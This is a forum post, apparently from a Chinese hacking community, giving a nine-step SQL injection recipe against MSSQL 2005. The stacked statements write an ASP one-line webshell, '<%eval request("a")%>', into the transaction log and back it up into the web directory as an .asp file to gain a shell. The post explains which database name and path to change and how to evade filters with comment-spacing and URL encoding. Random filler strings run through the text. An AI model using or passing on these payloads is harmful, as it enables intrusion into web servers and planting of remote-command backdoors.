找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2873|回复: 0
打印 上一主题 下一主题

mssql2005 DB权限导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:32:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。 . y$ I' m& h8 v  _6 V1 A
5 K9 l, k* H8 F( e7 j5 g
0 l" R3 Q8 ~0 f" z8 P
后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。 3 c; f% `$ O  M$ ^" h2 [) q1 }2 H' ^
& {' M5 A5 P9 j& e$ j" B: J
第一步
  p/ I7 t# S8 O7 t/ z7 H' e* t! u;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full-- 4 ]* Y2 @* C4 ~  ]+ H6 ~! K
9 S! t- ~7 A  l2 |( ^( H, f
第二步: 8 @1 q5 K9 c' m. e1 [( f/ ~
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- + V" C; g4 _+ C8 a7 {1 F

% j) Q/ K" Z3 g8 P7 V! D7 a第三步
$ R7 R2 y' J1 r' u1 d( g+ B4 K;drop/**/table/**/[itpro]--
0 o4 R, N4 g+ Y) w/ r  d - H% R5 ?: }9 i9 X. f" L  B! r3 O! w
第四步
6 L) r2 l/ h) U9 _& o;create/**/table/**/[itpro]([a]/**/image)-- ) L+ G& l1 f3 s5 n8 o9 u5 U! ^
$ |7 D2 \0 G# C# e
第五步
7 b/ V! W# q1 n* s6 F;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
7 C2 \; l5 R( M8 b % b: s4 ?; [; E: a( n
第六步
# ?7 Q3 U; r- K5 }- _" ~; `;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
, W$ K3 c% f3 d 3 ?  w0 m% H4 o$ F! X' ^
第七步
4 N+ u7 P4 f6 k; Z4 ?: ~$ ^3 D  G( p;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- 1 {. Q% D, `2 O0 ]; L8 h; C
; d4 A  b- H( a4 i( [) w) o
第八步 / d$ B0 I* L4 D6 I! E$ `
;drop/**/table/**/[itpro]--
* Y0 P( o) h" R! y# g  }% H
4 i- m  h$ P. x" J4 k+ \第九步 4 B! H: ^) y& s1 Y) x# k, P5 V
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- . F+ U4 }$ E% K7 @' N
% f5 O0 y4 @# k  G  N7 m
其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。. z/ T- L2 c; v/ x7 u" g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表